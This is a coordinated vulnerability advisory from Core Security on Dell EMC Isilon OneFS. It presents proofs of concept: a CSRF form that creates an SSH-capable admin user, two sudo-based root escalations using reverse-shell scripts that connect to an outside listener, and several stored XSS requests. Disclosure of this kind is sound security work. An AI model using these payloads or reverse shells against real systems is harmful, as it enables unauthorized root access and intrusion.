8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
7.2 High
CVSS2
Access Vector
LOCAL
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:L/AC:L/Au:N/C:C/I:C/A:C
0.002 Low
EPSS
Percentile
60.4%
**Title:**Dell EMC Isilon OneFS Multiple Vulnerabilities
**Advisory ID:**CORE-2017-0009
Advisory URL:<https://www.coresecurity.com/core-labs/advisories/dell-emc-isilon-onefs-multiple-vulnerabilities>
**Date published:**2018-02-14
**Date of last update:**2018-02-15
**Vendors contacted:**Dell EMC
**Release mode:**Coordinated release
**Class:**Cross-Site Request Forgery [CWE-352], Improper Privilege Management [CWE-269], Improper Privilege Management [CWE-269], Improper Neutralization of Input During Web Page Generation [CWE-79], Improper Neutralization of Input During Web Page Generation [CWE-79], Improper Neutralization of Input During Web Page Generation [CWE-79], Improper Neutralization of Input During Web Page Generation [CWE-79], Improper Neutralization of Input During Web Page Generation [CWE-79], Improper Neutralization of Input During Web Page Generation [CWE-79]
**Impact:**Code execution
**Remotely Exploitable:**Yes
**Locally Exploitable:**Yes
CVE Name:CVE-2018-1213, CVE-2018-1203, CVE-2018-1204, CVE-2018-1186, CVE-2018-1187, CVE-2018-1188, CVE-2018-1189, CVE-2018-1201, CVE-2018-1202
Dell EMC’s website states that:
[1] The EMC Isilon scale-out NAS storage platform combines modular hardware with unified software to harness unstructured data. Powered by the OneFS operating system, an EMC Isilon cluster delivers a scalable pool of storage with a global namespace.
The platform’s unified software provides centralized Web-based and command-line administration to manage the following features:
- A cluster that runs a distributed file system
- Scale-out nodes that add capacity and performance
- Storage options that manage files and tiering
- Flexible data protection and high availability
- Software modules that control costs and optimize resources
Multiple vulnerabilities were found in the Isilon OneFS Web console that would allow a remote attacker to gain command execution as root.
Other products and versions might be affected, but they were not tested.
Dell EMC has released DSA-2018-018 (requires Dell EMC Online Support credentials) to address the reported vulnerabilities.
For more details on Dell EMC Vulnerability Response Policy see <http://www.emc.com/products/security/product-security-response-center.htm>
These vulnerabilities were discovered and researched by Ivan Huertas and Maximiliano Vidal from Core Security Consulting Services. The publication of this advisory was coordinated by Alberto Solino from Core Advisories Team.
The Web console contains several sensitive features that are vulnerable to cross-site request forgery. We describe this issue in section 7.1.
Sections 7.2 and 7.3 show two vectors to escalate privileges to root.
Various persistent cross-site scripting issues are presented in the remaining sections (7.4, 7.5, 7.6, 7.7, 7.8, 7.9).
[CVE-2018-1213] There are no anti-CSRF tokens in any forms on the Web interface. This would allow an attacker to submit authenticated requests when an authenticated user browses an attacker-controlled domain.
The Web console contains a plethora of sensitive actions that can be abused, such as adding new users with SSH access or re-mapping existing storage directories to allow read-write-execute access to all users.
All requests are JSON-encoded, which in some cases might hinder exploitation of CSRF vulnerabilities. However, the application does not verify the content-type set. This allows an attacker to exploit the CSRF vulnerabilities by setting a text/plain content-type and sending the request body as JSON_PAYLOAD=ignored.
The following proof of concept creates a new user and assigns him a new role with enough privileges to log in via SSH, configure identifies, manage authentication providers, configure the cluster and run the remote support tools.
<html> <body> <form id="addUser" target="_blank" action="https: //192.168.1.11:8080
/platform/1/auth/users?query_member_of=true&resolve_names=true&start=0&zone=System&
provider=lsa-local-provider%3ASystem" method="POST" enctype="text/plain"> <input type
="hidden" name="{"name":"pepito","enabled":true,"shell":"/bin/zsh","password_expires"
:false,"password":"pepito"}" value="" /> </form> <form id="addRole" target="_blank"
action="https: //192.168.1.11:8080/platform/1/auth/roles" method="POST" enctype="text
/plain"> <input type="hidden" name="{"members":[{"name":"pepito","type":"user"}],"name"
:"pepito_role","privileges":[{"id":"ISI_PRIV_AUTH","name":"Auth","read_only":false},{"id"
:"ISI_PRIV_CLUSTER","name":"Cluster","read_only":false},{"id":"ISI_PRIV_REMOTE_SUPPORT",
"name":"Remote Support","read_only":false},{"id":"ISI_PRIV_LOGIN_SSH","name":"SSH",
"read_only":true}]}" value="" /> </form> <script> document.getElementById("addUser")
.submit(); window.setTimeout(function() { document.getElementById("addRole").submit() },
1000); </script> </body> </html>
[CVE-2018-1203] The compadmin user can run the tcpdump binary with root privileges via sudo. This allows for local privilege escalation, as tcpdump can be instructed to run shell commands when rotating capture files.
pepe-1$ id uid=11(compadmin) gid=0(wheel) groups=0(wheel),1(daemon) pepe-1$ cat
/tmp/lala.sh #!/bin/bash bash -i >& /dev/tcp/192.168.1.66/8888 0>&1
Once the desired shell script is in place, the attacker can run tcpdump as follows to trigger the execution:
pepe-1$ sudo tcpdump -i em0 -G 1 -z /tmp/lala.sh -w dump tcpdump: WARNING: unable to
contact casperd tcpdump: listening on em0, link-type EN10MB (Ethernet), capture size
65535 bytes /tmp/lala.sh: connect: Connection refused /tmp/lala.sh: line 3: /dev/tcp
/192.168.1.66/8888: Connection refused /tmp/lala.sh: connect: Connection refused
/tmp/lala.sh: line 3: /dev/tcp/192.168.1.66/8888: Connection refused
As can be seen below, the script runs with root privileges:
$ nc -lvp 8888 Listening on [0.0.0.0] (family 0, port 8888) Connection from
[192.168.1.11] port 8888 [tcp/*] accepted (family 2, sport 57692) bash: no
job control in this shell [root@ pepe-1 /compadmin]# id uid=0(root) gid=0(wheel)
groups=0(wheel),5(operator),10(admin),20(staff),70(ifs)
[CVE-2018-1204] From the documentation:
“OneFS allows remote support through EMC Secure Remote Services (ESRS) which monitors your EMC Isilon cluster, and with your permission, allows remote access to Isilon Technical Support personnel to gather cluster data and troubleshoot issues.”
“After you enable remote support through ESRS, Isilon Technical Support personnel can request logs with scripts that gather EMC Isilon cluster data and then upload the data. The remote support scripts based on the Isilon isi_gather_info log-gathering tool are located in the /ifs/data/Isilon_Support/ directory on each node.”
“Additionally, isi_phone_home, a tool that focuses on cluster- and node-specific data, is enabled once you enable ESRS. This tool is pre-set to send information about your cluster to Isilon Technical Support on a weekly basis. You can disable or enable isi_phone_home from the OneFS command-line interface.”
As a cluster administrator or compadmin, it is possible to enable the remote support functionality, hence enabling the isi_phone_home tool via sudo. This tool is vulnerable to a path traversal when reading the script file to run, which would enable an attacker to execute arbitrary python code with root privileges.
If remote support is not enabled, an attacker could perform the following operations in order to enable it:
pepe-1$ sudo isi network subnets create 1 ipv4 1 pepe-1$ sudo isi network pools
create 1.0 pepe-1$ sudo isi remotesupport connectemc modify --enabled=yes
--primary-esrs-gateway=10.10.10.10 --use-smtp-failover=no --gateway-access-pools=1.0
The isi_phone_home tool is supposed to run scripts located in the root-only writable directory /usr/local/isi_phone_home/script. However, the provided script name is used to construct the file path without sanitization, allowing an attacker to reference other locations.
def run_script(script_file_name): script_path = CFG.get('SCRIPTDIR') + '/' +
script_file_name if os.path.isfile(script_path): cmd = 'python ' + script_path
+ ' 2>&1 ' command_thread = command.Command(cmd) exit_code, output = command_thread
.run(int(CFG.get("SCRIPT_TIEMOUT"))) if exit_code: logging.error("Error: {0} running
script: {1} ".format(str(exit_code), output)) else: logging.error("File: {0}
list_file_name doesn't exist ".format(script_path))
The final step would be to create a malicious python script on any writable location and call it via the isi_phone_tool using sudo. Keep in mind that the previous steps are not required if the system does already have remote support enabled.
pepe-1$ cat /tmp/lala.py #!/usr/bin/env python import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("192.168.1.66",8888))
os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) p=subprocess.call
(["/bin/sh","-i"]) pepe-1$ sudo /usr/bin/isi_phone_home --script-file ../../../../../tmp/lala.py
$ nc -lvp 8888 Listening on [0.0.0.0] (family 0, port 8888) Connection from
[192.168.1.11] port 8888 [tcp/*] accepted (family 2, sport 56807) pepe-1# id
uid=0(root) gid=0(wheel) groups=0(wheel),5(operator),10(admin),20(staff),70(ifs)
[CVE-2018-1186] The description parameter of the /cluster/identity endpoint is vulnerable to cross-site scripting.
After the cluster’s description is updated, the payload will be executed every time the user opens the Web console.
PUT /platform/3/cluster/identity HTTP/1.1 Host: 192.168.1.11:8080 User-Agent:
Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0 Accept:
*/* Accept-Language: en-US,en;q=0.5 Content-Type: application/json X-Requested-With:
XMLHttpRequest Content-Length: 61 Cookie: isisessid=91835dd1-49de-4d40-9f09-94f6d029df24;
Connection: close {"description":"my cluster<img src />"}
[CVE-2018-1187] The description parameter of the /network/groupnets endpoint is vulnerable to cross-site scripting.
After the description is updated, the payload will be executed every time the user opens the network configuration page.
POST /platform/4/network/groupnets HTTP/1.1 Host: 192.168.1.11:8080 User-Agent:
Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0 Accept:
*/* Accept-Language: en-US,en;q=0.5 Content-Type: application/json Content-Length: 186
Cookie: isisessid=31f92221-15bb-421d-be00-d2bf42964c41; Connection: close {"description":
"lala<script>alert(1)</script>","dns_cache_enabled":true,"dns_options":[],"dns_search":[]
,"dns_servers":[],"name":"pepito2","server_side_dns_search":false}
[CVE-2018-1188] The realm parameter of the /auth/settings/krb5/realms endpoint is vulnerable to cross-site scripting.
After the realm is updated, the payload will be executed every time the user opens the Kerberos tab of the Authentication Providers page.
POST /platform/1/auth/settings/krb5/realms HTTP/1.1 Host: 192.168.1.11:8080 User-Agent:
Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0 Accept: */*
Accept-Language: en-US,en;q=0.5 Content-Type: application/json Content-Length: 78 Cookie:
isisessid=31f92221-15bb-421d-be00-d2bf42964c41; Connection: close {"is_default_realm":
true,"kdc":[],"realm":"ASDASD<img src=x onerror=alert(1)"}
[CVE-2018-1189] The name parameter of the /antivirus/policies endpoint is vulnerable to cross-site scripting.
After the name is updated, the payload will be executed every time the user opens the Antivirus page.
POST /platform/3/antivirus/policies HTTP/1.1 Host: 192.168.1.11:8080 User-Agent:
Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0 Accept:
*/* Accept-Language: en-US,en;q=0.5 Content-Type: application/json Content-Length: 172
Cookie: isisessid=c6903f55-43e7-42e2-b587-9f68142c3e06; Connection: close {"name":"pepe
<img src />","description":"pepito","enabled":true,"force_run":
false,"impact":null,"paths":["/ifs"],"recursion_depth":-1,"schedule":null}
[CVE-2018-1201] The description parameter of the /job/policies endpoint is vulnerable to cross-site scripting.
After the description is updated, the payload will be executed every time the user opens the Impact Policies section of the Job Operations page.
POST /platform/1/job/policies HTTP/1.1 Host: 192.168.1.11:8080 User-Agent: Mozilla/5.0
(X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/
xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding:
gzip, deflate Content-Type: application/json X-Requested-With: XMLHttpRequest Content-Length:
210 Cookie: isisessid=8a5026c0-f045-4505-9d2b-ae83bc90f8ea; Connection: close {"name":"my policy",
"description":"<img src />","intervals":[{"begin":"Sunday 00:00","end":
"Sunday 00:00","impact":"Low"},{"impact":"Low","begin":"Sunday 01:03","end":"Monday 01:01"}]}
[CVE-2018-1202] The name parameter of the /protocols/ndmp/users endpoint is vulnerable to cross-site scripting.
After the name is updated, the payload will be executed every time the user opens the NDMP Settings section of the NDMP page.
POST /platform/3/protocols/ndmp/users HTTP/1.1 Host: 192.168.1.11:8080 User-Agent: Mozilla/5.0
(X11; Ubuntu; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0 Accept: */* Accept-Language:
en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/json X-Requested-With:
XMLHttpRequest Content-Length: 64 Cookie: isisessid=91835dd1-49de-4d40-9f09-94f6d029df24;
Connection: close {"name":"<img src />","password":"123123"}
[1] <https://www.dellemc.com/en-us/storage/isilon/onefs-operating-system.htm>
CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: https://www.coresecurity.com/core-labs.
Core Security provides companies with the security insight they need to know who, how, and what is vulnerable in their organization. The company’s threat-aware, identity & access, network security, and vulnerability management solutions provide actionable insight and context needed to manage security risks across the enterprise. This shared insight gives customers a comprehensive view of their security posture to make better security remediation decisions. Better insight allows organizations to prioritize their efforts to protect critical assets, take action sooner to mitigate access risk, and react faster if a breach does occur.
Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia.
The contents of this advisory are copyright © 2018 Core Security and © 2018 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: <http://creativecommons.org/licenses/by-nc-sa/3.0/us/>
8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
7.2 High
CVSS2
Access Vector
LOCAL
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:L/AC:L/Au:N/C:C/I:C/A:C
0.002 Low
EPSS
Percentile
60.4%